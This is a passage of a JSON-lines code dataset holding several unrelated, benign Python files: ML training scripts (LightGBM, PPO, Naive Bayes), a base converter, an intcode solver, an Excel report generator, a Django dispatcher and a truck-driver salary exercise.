cv.imwrite('./image/{}.jpg'.format(i), gray)\r\n            ff.writelines('./image/{}.jpg,{}\\n'.format(i, (i) % 10+1))\r\n            i = i + 1\r\n        else:\r\n            break\r\n    ff.close()\r\n    cap.release()\r\n    cv.destroyAllWindows()\r\n","sub_path":"capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"160222015","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom util import *\nfrom gbm import lgb_modelfit_nocv\n\ndatatypes = {\n    'key': 'str',\n    'fare_amount': 'float32',\n    'pickup_datetime': 'str',\n    'pickup_longitude': 'float32',\n    'pickup_latitude': 'float32',\n    'dropoff_longitude': 'float32',\n    'dropoff_latitude': 'float32',\n    'passenger_count': 'uint8'\n}\ntrain = pd.read_csv(\"./data/smallset4.csv\", dtype=datatypes)\n#test = pd.read_csv(\"./data/test.csv\", dtype=datatypes)\n\ntrain = clean_data(train)\n\ntrain = add_time_features(train)\n#test = add_time_features(test)\n\nadd_coordinate_features(train)\n#add_coordinate_features(test)\n\ntrain = add_distances_features(train)\n#test = 
add_distances_features(test)\n\nwanted_columns = [\n 'pickup_longitude',\n 'pickup_latitude',\n 'dropoff_longitude',\n 'dropoff_latitude',\n 'pickup_longitude_radian',\n 'pickup_latitude_radian',\n 'dropoff_longitude_radian',\n 'dropoff_latitude_radian',\n 'latdiff',\n 'londiff',\n 'euclidean',\n 'manhattan',\n 'sphere',\n 'bearing',\n 'downtown_pickup_distance',\n 'downtown_dropoff_distance',\n 'jfk_pickup_distance',\n 'jfk_dropoff_distance',\n 'ewr_pickup_distance',\n 'ewr_dropoff_distance',\n 'lgr_pickup_distance',\n 'lgr_dropoff_distance',\n 'downtown_pickup_distance_sphere',\n 'downtown_dropoff_distance_sphere',\n 'jfk_pickup_distance_sphere',\n 'jfk_dropoff_distance_sphere',\n 'ewr_pickup_distance_sphere',\n 'ewr_dropoff_distance_sphere',\n 'lgr_pickup_distance_sphere',\n 'lgr_dropoff_distance_sphere',\n 'jfk_pickup_distance_bear',\n 'jfk_dropoff_distance_bear',\n 'ewr_pickup_distance_bear',\n 'ewr_dropoff_distance_bear',\n 'lgr_pickup_distance_bear',\n 'lgr_dropoff_distance_bear',\n 'downtown_pickup_distance_bear',\n 'downtown_dropoff_distance_bear',\n]\n\ntrain_df, validation_df = train_test_split(\n train, test_size=0.1, random_state=1)\n\none_hot_columns = [\n 'month', 'day', 'hour', 'weekday', 'night', 'late_night', 'year'\n]\n\ntarget = \"fare_amount\"\n\nparams = {\n 'learning_rate': 0.05,\n #'is_unbalance': 'true', # replaced with scale_pos_weight argument\n 'num_leaves': 31, # we should let it be smaller than 2^(max_depth)\n 'max_depth': -1, # -1 means no limit\n 'min_child_samples': 10,\n 'max_bin': 100, # Number of bucketed bin for feature values\n 'subsample': 0.7, # Subsample ratio of the training instance.\n 'subsample_freq': 1, # frequence of subsample, <=0 means no enable\n 'colsample_bytree':\n 0.7, # Subsample ratio of columns when constructing each tree.\n 'min_child_weight':\n 1, # Minimum sum of instance weight(hessian) needed in a child(leaf)\n 'min_split_gain': 0.5,\n}\n\nbst = lgb_modelfit_nocv(\n params,\n train_df,\n validation_df,\n wanted_columns + one_hot_columns,\n target,\n early_stopping_rounds=50,\n verbose_eval=True,\n num_boost_round=3000,\n categorical_features=one_hot_columns)\n\nprint(\"Features importance...\")\ngain = bst.feature_importance('gain')\nft = pd.DataFrame({\n 'feature': bst.feature_name(),\n 'split': bst.feature_importance('split'),\n 'gain': 100 * gain / gain.sum()\n}).sort_values(\n 'gain', ascending=False)\nprint(ft.head(100))\n","sub_path":"taxifare_lgbm.py","file_name":"taxifare_lgbm.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"351187608","text":"import sys\nsys.path.append('../Models')\nfrom AtariModels import CNN\n\nimport tensorflow as tf\nimport tensorflow.keras.backend as K\nimport sys\n\nimport numpy as np\n\nclass PPO:\n\n def __init__(self, network, input_shape, output_shape, summary_writer):\n self.input_shape = input_shape\n self.output_shape = output_shape\n self.training_counter = 0\n self.learning_rate = 1e-3\n self.discount = .99\n self.LAMBDA = 1\n self.clip_range = .2\n self.summary_writer = summary_writer\n config = tf.ConfigProto(allow_soft_placement=True)\n config.gpu_options.allow_growth = True\n self.session = tf.Session(config=config)\n K.set_session(self.session)\n K.manual_variable_initialization(True)\n self.input, self.value, self.policy, self.h_state, self.c_state, self.h_state_out, self.c_state_out, self.state_shape = CNN('PPO', input_shape, output_shape, network)\n self.buildLoss('PPO')\n 
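# buildLoss (defined below) assembles the clipped PPO surrogate: -min(ratio * advantage, clip(ratio, 1 - eps, 1 + eps) * advantage), with eps = self.clip_range.\n        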
self.session.run(tf.global_variables_initializer())\n self.default_graph = tf.get_default_graph()\n self.default_graph.finalize()\n\n def act(self, observation, h_state, c_state):\n with self.session.as_default():\n policy, value, h_state, c_state = self.session.run([self.policy, self.value, self.h_state_out, self.c_state_out], feed_dict = {\n self.input:np.array([observation]),\n self.h_state:np.array([h_state]),\n self.c_state:np.array([c_state])\n })\n policy = policy[0]\n return np.random.choice(len(policy), p=policy), value, h_state[0], c_state[0], policy\n\n def getValue(self, observation, h_state, c_state):\n with self.session.as_default():\n return self.session.run(self.value, feed_dict = {\n self.input:np.array([observation]),\n self.h_state:np.array([h_state]),\n self.c_state:np.array([c_state])\n })\n\n def buildLoss(self, variable_scope):\n with tf.variable_scope(variable_scope):\n self.action_selected = tf.placeholder(tf.float32, [None, self.output_shape[0]])\n self.target_value = tf.placeholder(tf.float32,[None])\n self.advantage = tf.placeholder(tf.float32, [None])\n self.old_prob = tf.placeholder(tf.float32, [None, self.output_shape[0]])\n # advantage = self.target_value - self.value\n action_probability = tf.reduce_sum(self.action_selected * self.policy, axis=1)\n old_action_probability = tf.reduce_sum(self.action_selected * self.old_prob, axis=1)\n log_prob = tf.log(action_probability + 1e-10)\n old_log_prob = tf.log(old_action_probability + 1e-10)\n\n ratio = tf.exp(log_prob - old_log_prob)\n clipped_ratio = tf.clip_by_value(ratio, 1 - self.clip_range, 1 + self.clip_range)\n policy_loss = -tf.minimum(ratio * self.advantage, clipped_ratio * self.advantage)\n\n value_loss = tf.square(self.target_value - self.value)\n\n entropy = tf.reduce_sum(self.policy * tf.log(self.policy + 1e-10), axis=-1)\n\n loss = tf.reduce_mean(policy_loss + .5 * value_loss + .01 * entropy)\n\n opt = tf.train.AdamOptimizer(self.learning_rate)\n\n grads, vars = zip(*opt.compute_gradients(loss))\n grads, glob_norm = tf.clip_by_global_norm(grads, 50.0)\n self.train_op = opt.apply_gradients(zip(grads, vars))\n\n summary = []\n summary.append(tf.summary.scalar(\n 'policy_loss', tf.reduce_mean(policy_loss)))\n summary.append(tf.summary.scalar(\n 'glob_norm', glob_norm))\n summary.append(tf.summary.scalar(\n 'value_loss', tf.reduce_mean(value_loss)))\n summary.append(tf.summary.scalar(\n 'entropy_loss', tf.reduce_mean(entropy)))\n summary.append(tf.summary.scalar(\n 'loss', tf.reduce_mean(loss)))\n\n self.summary_op = tf.summary.merge(summary)\n\n def updateModel(self, queue, epochs):\n\n feed = {}\n for batch in queue:\n if self.input not in feed:\n feed[self.input] = batch['observations']\n feed[self.target_value] = batch['rewards']\n feed[self.action_selected] = batch['action_selected']\n feed[self.h_state] = batch['h_state']\n feed[self.c_state] = batch['c_state']\n feed[self.advantage] = batch['advantage']\n feed[self.old_prob] = batch['old_prob']\n else:\n feed[self.input] = np.concatenate((feed[self.input], batch['observations']))\n feed[self.target_value]= np.concatenate((feed[self.target_value], batch['rewards']))\n feed[self.action_selected] = np.concatenate((feed[self.action_selected],batch['action_selected']))\n feed[self.h_state] = np.concatenate((feed[self.h_state],batch['h_state']))\n feed[self.c_state] = np.concatenate((feed[self.c_state],batch['c_state']))\n feed[self.advantage] = np.concatenate((feed[self.advantage], batch['advantage']))\n feed[self.old_prob] = 
np.concatenate((feed[self.old_prob], batch['old_prob']))\n\n for _ in range(epochs):\n _, summary = self.session.run([self.train_op,self.summary_op], feed_dict = feed)\n self.training_counter += 1\n self.summary_writer.add_summary(summary, self.training_counter)\n self.summary_writer.flush()\n","sub_path":"PPO/PPO.py","file_name":"PPO.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"560803563","text":"#!/bin/python3.6\n#\n# This program is intended for translate numbers from system\n# with one base to system with other base. Range of bases is\n# from 2 to 16.\n#\n# b1 - base of first system\n# b2 - base of second system\n# n - number in first system\n\n# This function is intended for printing error message if number is out of range of system\n\ndef attention():\n print(\"This number is out of range of this system!\")\n\n# This function is intended for translate numbers from decimal system to other system\n\ndef dec_to_num(n, b2):\n n = int(n)\n if n == 0:\n return 0\n else:\n b2 = int(b2)\n result = ''\n dec_to_hex_dict = {'10':'A', '11':'B', '12':'C', '13':'D', '14':'E', '15':'F'} # Mapping decimal numbers to hexadecimal numbers\n # Algorithm for translate from decimal system to other system\n while n != 0:\n if n % b2 == 0:\n result += '0'\n n = n // b2\n else:\n num = str(n - ((n // b2) * b2))\n if 10 <= int(num) <= 16: # If number, which we get as a result of dividing, is in a range from 10 to 16, then\n result += dec_to_hex_dict.get(num)\n else:\n result += num\n n = n // b2\n return result[::-1]\n\n# This function is intended for translate numbers from some system to decimal system\n\ndef num_to_dec(n, b1):\n num_error = 0\n b1 = int(b1)\n n = str(n)\n result = 0\n hex_to_dec_dict= {'A':'10', 'B':'11', 'C':'12', 'D':'13', 'E':'14', 'F':'15'} # Mapping hexadecimal numbers to decimal numbers\n for i in range(len(n)):\n if n[i].isalpha(): # Checking that symbol is a letter\n if n[i] in hex_to_dec_dict.keys(): # If letter is inside the list, then\n result += int(hex_to_dec_dict.get(n[i])) * (b1 ** (len(n) - (i + 1)))\n else: # If letter is not inside the list, then\n num_error += 1\n else: # If symbol is not a letter\n if int(n[i]) >= b1: # If number is greater than or equal it's base of system, then\n num_error += 1\n else:\n result += int(n[i]) * (b1 ** (len(n) - (i + 1)))\n if num_error > 0: # If number of errors is greater than 0, then\n attention()\n return 0\n else: # If numbers of errors is equal 0, then\n return result\n\ninp_data = input(\"Enter sequence b1,b2,n: \").split(\",\")\n\nif inp_data[0] < inp_data[1]: # If base1 < base2, then\n result = num_to_dec(inp_data[2], inp_data[0])\n result = dec_to_num(result, inp_data[1])\nelif inp_data[0] > inp_data[1]: # If base1 > base2, then\n result = num_to_dec(inp_data[2], inp_data[0])\n result = dec_to_num(result, inp_data[1])\nelif inp_data[0] == inp_data[1]: # If base1 = base2, then\n result = inp_data[2]\n\nif result == 0:\n pass\nelse:\n print(result)\n","sub_path":"num1-to-num2.py","file_name":"num1-to-num2.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475111658","text":"# Conway Hsieh\r\n# 10-601 Naive Bayes\r\n# 11/23/2018\r\n\r\n# import libraries\r\nimport re, collections, sys, math, string, pprint, numpy as np\r\n\r\npp = pprint.PrettyPrinter(indent=4)\r\n\r\n#filename is input 1\r\ntrainFileName = 
sys.argv[1]\r\ntestFileName = sys.argv[2]\r\nq = float(sys.argv[3])\r\n\r\n#create list to store train file names\r\nwith open(trainFileName,\"r\") as f:\r\n trainFiles = f.readlines()\r\nwith open(testFileName, \"r\") as f:\r\n\ttestFiles = f.readlines()\r\n\r\n# strip \\n\r\ntrainFiles = [x.strip() for x in trainFiles] \r\ntestFiles = [x.strip() for x in testFiles]\r\n\r\n#pp.pprint(trainFiles)\r\n\r\nlibWordCounter = collections.Counter()\r\nconWordCounter = collections.Counter()\r\nmasterWordCounter = collections.Counter()\r\nmasterWordList = list()\r\nnumLib = 0\r\nnumCon = 0\r\nsizeLibText = 0\r\nsizeConText = 0\r\nfor numFile in range(len(trainFiles)):\r\n\t# read in all words as lower case \r\n\twords = re.findall(r'[A-Za-z\\']+(?:\\`[A-Za-z]+)?', \\\r\n\t\topen(trainFiles[numFile], encoding=\"latin-1\").read().lower())\r\n\t# create counter based on current doc\r\n\twordCount = collections.Counter(words)\r\n\r\n\tmasterWordCounter += wordCount\r\n\t\r\n\t# append list of all words in current document to master list\r\n\tmasterWordList.append(words)\r\n\r\n\t# add counters to respective counter obj\r\n\tif re.match('^lib',trainFiles[numFile]):\r\n\t\tlibWordCounter += wordCount\r\n\t\tnumLib += 1\r\n\t\tsizeLibText += len(words)\r\n\telse:\r\n\t\tconWordCounter += wordCount\r\n\t\tnumCon += 1\r\n\t\tsizeConText += len(words)\r\n\r\nnumTexts = numLib + numCon\r\npLib = numLib/numTexts\r\npCon = numCon/numTexts\r\n\r\n# flatten list to 1D\r\nmasterWordList = [item for sublist in masterWordList for item in sublist]\r\ntotalWords = len(masterWordList)\r\n\r\n# create list of unique words from all training texts\r\nmasterWordSet = list(set(masterWordList))\r\nnumUniqueWords = len(masterWordSet)\r\n\r\n#print(totalWords)\r\n#print(numUniqueWords)\r\n\r\n# start testing\r\nnumCorrect = 0\r\n#print(testFiles)\r\nfor numFile in range(len(testFiles)):\r\n\twords = re.findall(r'[A-Za-z\\']+(?:\\`[A-Za-z]+)?', \\\r\n\t\topen(testFiles[numFile], encoding=\"latin-1\").read().lower())\r\n\t#print(testFiles[numFile])\r\n\t# create counter based on current doc\r\n\twordCount = collections.Counter(words)\r\n\t# create list of only all words in current doc\r\n\r\n\tcurrPLib = math.log(pLib)\r\n\tcurrPCon = math.log(pCon)\r\n\r\n\t#print(pLib)\r\n\t#print(currPLib)\r\n\t#print(currPCon)\r\n\r\n\t# for each word\r\n\tfor word in range(len(words)):\r\n\t\tif masterWordCounter[words[word]] == 0:\r\n\t\t\tcontinue\r\n\t\t#print(words[word])\r\n\t\tnumLibOcc = libWordCounter[words[word]]\r\n\t\tnumConOcc = conWordCounter[words[word]]\r\n\t\t#print(numLibOcc)\r\n\t\t#print(numConOcc)\r\n\r\n\t\ttry:\r\n\t\t\tcurrPLib += math.log((numLibOcc + q)/(sizeLibText + q*numUniqueWords))\r\n\t\t\tcurrPCon += math.log((numConOcc + q)/(sizeConText + q*numUniqueWords))\r\n\t\texcept:\r\n\t\t\tpass\r\n\t\t#print(currPLib)\r\n\t\t#print(currPCon)\r\n\r\n\t#currPLib = abs(currPLib)\r\n\t#currPCon = abs(currPCon)\r\n\t#print(currPLib)\r\n\t#print(currPCon)\r\n\tif currPLib >= currPCon:\r\n\t\tlib = True\r\n\t\tprint('L')\r\n\telse:\r\n\t\tlib = False\r\n\t\tprint('C')\r\n\r\n\tif re.match('^lib',testFiles[numFile]):\r\n\t\tisLib = True\r\n\telse:\r\n\t\tisLib = False\r\n\t#print(isLib)\r\n\r\n\tif isLib == lib:\r\n\t\tnumCorrect += 1\r\n\r\nprint('Accuracy: {:.04f}'.format(numCorrect/len(testFiles)))\r\n","sub_path":"HW9/smoothing.py","file_name":"smoothing.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
+{"seq_id":"176090437","text":"#!/usr/bin/env python3\n\n# Tip: look at day 7, intcode.py for a general intcode machine.\n\narr = []\n\nfor i in map(int, input('').split(',')):\n arr.append(i)\n\narr[1] = 12\narr[2] = 2\n\npc = 0\nop = 0\nwhile op != 99:\n op = arr[pc]\n if op == 99:\n #print(arr)\n print(arr[0])\n exit(0)\n pc += 1\n a, b, c = arr[pc : pc + 3]\n pc += 3\n if op == 1:\n res = arr[a] + arr[b]\n elif op == 2:\n res = arr[a] * arr[b]\n else:\n print('illegal op %d at pos %d' % op, pc - 4)\n exit(1)\n arr[c] = res\n","sub_path":"02/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341347937","text":"import sys, time, datetime, openpyxl\nfrom lxml import etree\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport matplotlib\nimport xlrd\nfrom openpyxl.styles import *\nfrom openpyxl.cell import Cell\nfrom openpyxl.chart import (PieChart, LineChart, ProjectedPieChart, Reference)\nfrom openpyxl.chart.series import DataPoint\nfrom decimal import *\nfrom pylab import title, figure, xlabel, ylabel, xticks, bar, legend, axis, savefig\n\nfrom db_module import *\nfrom kpi_module import *\nfrom report_abstract import *\n\n\nclass Multi_Validation_Report(Report): # 다중노드의 경우 validation report는 이쪽으로 들어온다.\n ana_tag: str\n user_id: str\n start_dt: str\n end_dt: str\n file_name: str\n count: int\n div: str\n dbmodule: object\n kpimodule: object\n\n def __init__(self, ana_tag, user_id, start_dt, end_dt, file_name, div, bottle_tag=None):\n self.ana_tag = ana_tag\n self.user_id = user_id\n self.start_dt = start_dt\n self.end_dt = end_dt\n self.file_name = file_name\n self.div = div\n self.bottle_tag = bottle_tag\n self.dbmodule = withDB()\n self.taggs = self.dbmodule.selectValidationTagByTag(ana_tag)\n self.count = len(self.taggs)\n\n self.dbmodule = withDB()\n self.kpimodule = KPI_module(start_dt, end_dt, div, ana_tag)\n\n def basic_inform_cell(self, ws: object, start_idx: int, end_idx: int, title: list, value: list, style: object): # 셀 그리는 기능\n for i in range(start_idx, end_idx):\n ws.merge_cells('F' + str(i) + ':G' + str(i))\n ws = self.cell_method(ws, 'F' + str(i), title[i - start_idx], 11, True)\n ws.merge_cells('H' + str(i) + ':I' + str(i))\n ws = self.cell_method(ws, 'H' + str(i), value[i - start_idx], 11)\n ws['F' + str(i)].border, ws['G' + str(i)].border, ws['H' + str(i)].border, ws[\n 'I' + str(i)].border = style, style, style, style\n return ws\n\n def data_preprocess(self, datas: list, div: str): # validation 데이터를 가져와서 list별로 분류하는 기능.\n v_type, validation_value, start_time, check_time, result, user_id = [], [], [], [], [], []\n for i in range(0, self.count):\n v_type.append([])\n validation_value.append([]) # 3개 라면 [[],[],[]] 로 처음 배열 생성.\n start_time.append([])\n check_time.append([])\n result.append([])\n user_id.append([])\n for j in range(0, self.count):\n for k in range(0, len(datas)):\n if datas[k][0] == self.taggs[j][0]:\n v_type[j].append(datas[k][1])\n validation_value[j].append(round(float(datas[k][2]), 2))\n start_time[j].append(str(datas[k][3])[2:16])\n check_time[j].append(str(datas[k][4])[2:16])\n result[j].append(datas[k][5])\n user_id[j].append(datas[k][6])\n return (v_type, validation_value, start_time, check_time, result, user_id)\n\n def data_array(self, ws: object, div: str, datas: list, linestyle: object, fillstyle: object): # data를 반복문을 이용해서 파일에 쓴다.\n preprocessing_data = self.data_preprocess(datas, div)\n v_type, 
        v_type, validation_value, start_time, check_time, result, user_id = preprocessing_data[0], preprocessing_data[\n            1], preprocessing_data[2], preprocessing_data[3], preprocessing_data[4], preprocessing_data[5]\n        row = len(validation_value[0]) # the record count for one tag is the number of rows.\n        col_num = len(validation_value) # the tag count is how many value columns must be added.\n        cell_char = ['C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',\n                     'W', 'X', 'Y', 'Z']\n\n        for i in range(35, 35 + row):\n            if i % 2 == 0:\n                ws = self.cell_method(ws, 'A' + str(i), str(i - 35), 11)\n                ws = self.cell_method(ws, 'B' + str(i), v_type[0][i - 35], 11)\n                for k in range(0, col_num):\n                    ws = self.cell_method(ws, cell_char[k] + str(i), validation_value[k][i - 35], 11)\n                ws = self.cell_method(ws, cell_char[col_num] + str(i), start_time[0][i - 35], 11)\n                ws = self.cell_method(ws, cell_char[col_num + 1] + str(i), check_time[0][i - 35], 11)\n                ws = self.cell_method(ws, cell_char[col_num + 2] + str(i), result[0][i - 35], 11)\n                ws = self.cell_method(ws, cell_char[col_num + 3] + str(i), user_id[0][i - 35], 11)\n\n                ws['A' + str(i)].fill, ws['B' + str(i)].fill = fillstyle, fillstyle\n                for m in range(1, col_num + 5):\n                    ws[cell_char[m - 1] + str(i)].fill = fillstyle\n            else:\n                ws = self.cell_method(ws, 'A' + str(i), str(i - 35), 11)\n                ws = self.cell_method(ws, 'B' + str(i), v_type[0][i - 35], 11)\n                for k in range(0, col_num):\n                    ws = self.cell_method(ws, cell_char[k] + str(i), validation_value[k][i - 35], 11)\n                ws = self.cell_method(ws, cell_char[col_num] + str(i), start_time[0][i - 35], 11)\n                ws = self.cell_method(ws, cell_char[col_num + 1] + str(i), check_time[0][i - 35], 11)\n                ws = self.cell_method(ws, cell_char[col_num + 2] + str(i), result[0][i - 35], 11)\n                ws = self.cell_method(ws, cell_char[col_num + 3] + str(i), user_id[0][i - 35], 11)\n                ws['A' + str(i)].border, ws['B' + str(i)].border = linestyle, linestyle\n                for m in range(1, col_num + 5):\n                    ws[cell_char[m - 1] + str(i)].border = linestyle\n        return ws\n\n    def column_cell(self, ws: object, div: str, style: object): # writes the header row for the data table.\n        valid_tag = self.taggs # (('1630AI355A-VV',), ('1630AI355B-VV',), ('1630AI355C-VV',))\n        columns = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',\n                   'U', 'V', 'W', 'X', 'Y', 'Z']\n        column_name = []\n        width_no = []\n        if div == \"Validation\":\n            column_width = [5, 10, 15, 15, 10, 10]\n            fixed_column_name = ['no', 'Type', 'Start Date', 'Check Date', 'Result', 'User']\n            for i in range(0, 2 + len(valid_tag)):\n                if i < 2:\n                    column_name.append(fixed_column_name[i])\n                    width_no.append(column_width[i])\n                else:\n                    column_name.append(valid_tag[i - 2][0])\n                    width_no.append(15)\n            for k in range(2 + len(valid_tag), len(valid_tag) + 6):\n                column_name.append(fixed_column_name[k - len(valid_tag)])\n                width_no.append(column_width[k - len(valid_tag)])\n\n        elif div == \"Trend\":\n            column_width = [5, 15, 15]\n            fixed_column_name = ['no', 'Start Date', 'Check Date']\n            for i in range(0, 1 + len(valid_tag)):\n                if i < 1:\n                    column_name.append(fixed_column_name[i])\n                    width_no.append(column_width[i])\n                else:\n                    column_name.append(valid_tag[i - 1][0])\n                    width_no.append(15)\n            for k in range(1 + len(valid_tag), 3 + len(valid_tag)):\n                column_name.append(fixed_column_name[k - len(valid_tag)])\n                width_no.append(column_width[k - len(valid_tag)])\n        for i in range(0, len(column_name)):\n            ws[columns[i] + '34'] = column_name[i]\n            ws[columns[i] + '34'].font = Font(name=\"맑은 고딕\", size=11, bold=True)\n
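            # \"맑은 고딕\" is the Malgun Gothic font; each header cell is centered, bordered, and given a fixed width below.\n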
            ws[columns[i] + '34'].alignment = Alignment(horizontal='center', vertical='center')\n            ws[columns[i] + '34'].border = style\n            ws.column_dimensions[columns[i]].width = width_no[i]\n        return ws\n\n    def kpi_chart(self, ws: object): # draws the KPI pie chart.\n        chart = PieChart()\n        label_min_col = 3\n        data_min_col = 5\n        labels = Reference(ws, min_col=(label_min_col + self.count), min_row=12, max_row=14) # the values written in these cells become the labels.\n        data = Reference(ws, min_col=(data_min_col + self.count), min_row=12, max_row=14) # the values written in these cells become the pie slices.\n        chart.add_data(data)\n        chart.set_categories(labels)\n        chart.title = \"KEY PERFORMANCE CHART\"\n        chart.height = 6.8\n        chart.width = 11\n        slice = DataPoint(idx=0, explosion=5)\n        chart.series[0].data_points = [slice]\n        ws.add_chart(chart, \"B7\")\n        return ws\n\n    def trend_chart(self, ws: object, length: int):\n        chart = LineChart()\n        data_max_col = 2\n        P_datas = Reference(ws, min_col=3, min_row=35, max_col=(data_max_col + self.count),\n                            max_row=34 + int(length / self.count)) # the values written in these cells become the trend lines.\n        chart.add_data(P_datas)\n        chart.title = \"VALUE TREND\"\n        chart.height = 6.8\n        chart.width = 21\n        ws.add_chart(chart, \"A20\")\n        return ws\n\n    def make_excel_report(self):\n        house_tag = self.dbmodule.selectHousetagByAnalyzertag(self.ana_tag)\n        datas = self.dbmodule.dataForReport(self.start_dt, self.end_dt, self.div, self.ana_tag)\n\n        (headerFill, header2Fill, tableFill, thin_border, top_bottom_border) = self.design_for_report() # only fetches the cell styles.\n        (availability_rate, check_rate, break_rate) = self.kpimodule.calculate_kpi() # the required KPI figures\n        reproducibility_rate = self.kpimodule.calculate_reproducibility(self.ana_tag, self.start_dt, self.end_dt,\n                                                                        self.bottle_tag) # reproducibility value\n        (mtbf, mttr, mttf) = self.kpimodule.calculate_mean_break_time() # the MTBF-related figures\n\n        write_wb = openpyxl.Workbook()\n        ws = write_wb.active\n\n        ws.merge_cells('A1:G4')\n        ws['A1'].fill = headerFill\n        ws = self.title_cell(ws, self.div, \"TITLE\")\n\n        ws.merge_cells('H1:I2')\n        ws['H1'].fill = header2Fill\n        ws = self.cell_method(ws, 'H1', 'AMADAS', 11)\n\n        ws.merge_cells('A5:E6')\n        ws = self.cell_method(ws, 'A5', 'PERFORMANCE HISTORY CHART', 11, True)\n\n        label = ['House', 'Analyzer', 'Period Start', 'Period End', 'Operator']\n        value = [house_tag, self.ana_tag, self.start_dt, self.end_dt, self.user_id]\n        ws = self.basic_inform_cell(ws, 5, 10, label, value, thin_border)\n\n        rate = ['Availability Rate', 'Checking Rate', 'Breakdown Rate', 'Reproducibility',\n                'MTBF', 'MTTF', 'MTTR']\n        values = [round(float(availability_rate), 2), round(float(check_rate), 2), round(float(break_rate), 2),\n                  round(float(reproducibility_rate), 2),\n                  round(float(mtbf), 2), round(float(mttf), 2), round(float(mttr), 2)]\n\n        ws = self.basic_inform_cell(ws, 12, 18, rate, values, thin_border)\n\n        cell_char = ['F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X']\n        for i in range(1, 18):\n            if self.count == i:\n                ws.merge_cells('A32:' + cell_char[i] + '33')\n                ws = self.data_array(ws, self.div, datas, top_bottom_border, tableFill)\n                break\n            else:\n                pass\n\n        ws = self.title_cell(ws, self.div, \"VALUE\")\n        ws = self.column_cell(ws, self.div, top_bottom_border)\n\n        ws = self.kpi_chart(ws)\n        ws = self.trend_chart(ws, len(datas))\n\n        print(\"Report generated successfully\")\n        write_wb.save(self.file_path() + self.file_name + \".xlsx\") # write the final file\n        return 
\"OK\"","sub_path":"multi_validation_report.py","file_name":"multi_validation_report.py","file_ext":"py","file_size_in_byte":11826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287098147","text":"from django.http import HttpResponse\nfrom django.utils import simplejson as json\nelement_handlers_registry ={}\n\ndef register_element_update_handler(handler_type, handler):\n element_handlers_registry[handler_type] = handler\n\ndef element_update_dispatcher(request):\n message_list = json.loads(request.raw_post_data)\n response = {\"new_elements\":[],\"update_data\":{}}\n for element_id in message_list.iterkeys():\n message = message_list[element_id]\n element_type_handler=element_handlers_registry[message[\"type\"]]\n new_elements, update_data = element_type_handler(element_id,message[\"data\"])\n for new_element in new_elements:\n response[\"new_elements\"].append(new_element.to_context_map())\n response[\"update_data\"][element_id] = update_data\n return HttpResponse(json.dumps(response), content_type='application/json')\n\naction_handlers_registry = {}\n\ndef register_action_handler(action_id,handler):\n action_handlers_registry[action_id] = handler\n\ndef action_dispatcher(request):\n request_data = json.loads(request.raw_post_data)\n response = action_handlers_registry[request_data[\"id\"]](**request_data[\"arguments\"])\n return HttpResponse(json.dumps(response), content_type='application/json')","sub_path":"jabberwocky/ria.py","file_name":"ria.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"104623192","text":"# Напишете програма която пресмята колко пари ще изкара шофьор на ТИР за един сезон.\n# На входа програмата получава през кой сезон ще работи шофьора, както и колко километра на месец ще кара.\n# Един сезон е 4 месеца. Според зависи сезона и броя километри на месец ще му се заплаща различна сума на километър:\n# Изход\n# На конзолата трябва да се отпечатат едно число:\n# •\tЗаплатата на шофьора след данъците, форматирана до втория знак след десетичната запетая.\n\nseason = input() # – Сезон – текст \"Spring\", \"Summer\", \"Autumn\" или \"Winter\"\nkm_per_month = float(input()) # – Километри на месец – реално число\nprice_per_km = 0\ntax = 0.9\nif km_per_month <= 5000:\n if season == \"Spring\" or season == \"Autumn\":\n price_per_km = 0.75\n elif season == \"Summer\":\n price_per_km = 0.90\n elif season == \"Winter\":\n price_per_km = 1.05\nelif 5000 < km_per_month <= 10000:\n if season == \"Spring\" or season == \"Autumn\":\n price_per_km = 0.95\n elif season == \"Summer\":\n price_per_km = 1.1\n elif season == \"Winter\":\n price_per_km = 1.25\nelif 10000 < km_per_month <= 20000:\n price_per_km = 1.45\nsalary = (price_per_km * km_per_month * 4) * tax\nprint(f\"{salary:.2f}\")","sub_path":"Python Basics June 2020/3 conditional_statements_more_ex/3.3.6. truck_driver.py","file_name":"3.3.6. 
